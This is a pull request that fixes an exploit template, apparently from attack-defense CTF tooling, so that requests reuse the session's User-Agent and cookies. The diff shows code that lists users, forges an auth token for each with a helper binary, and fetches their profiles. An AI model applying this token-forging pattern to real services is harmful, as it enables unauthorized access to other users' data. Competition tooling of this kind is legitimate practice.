### PR TITLE
Fix python requests template to use the current session

### DIFF
--- a/exploits/_template/exploit.py
+++ b/exploits/_template/exploit.py
@@ -78,7 +78,7 @@ class HttpExploiter(requests.Session):
         return self._base + a
 
     def get_users(self):
-        r = requests.get(self.u('/api/v1/users'), params={
+        r = self.get(self.u('/api/v1/users'), params={
             're': r'.+-.+-.+'
         })
         users = r.json()
@@ -88,7 +88,7 @@ class HttpExploiter(requests.Session):
 
     def get_address(self, user):
         token = subprocess.check_output(['./powder', user]).decode().strip()
-        r = requests.get(self.u('/api/v1/user/profile'), headers={
+        r = self.get(self.u('/api/v1/user/profile'), headers={
             'token': token.strip()
         })
         profile = r.json()


### PR DESCRIPTION
Otherwise the User-Agent and any cookies wont be set/preserved

Additional suggestion for the base url support: https://toolbelt.readthedocs.io/en/latest/sessions.html#baseurlsession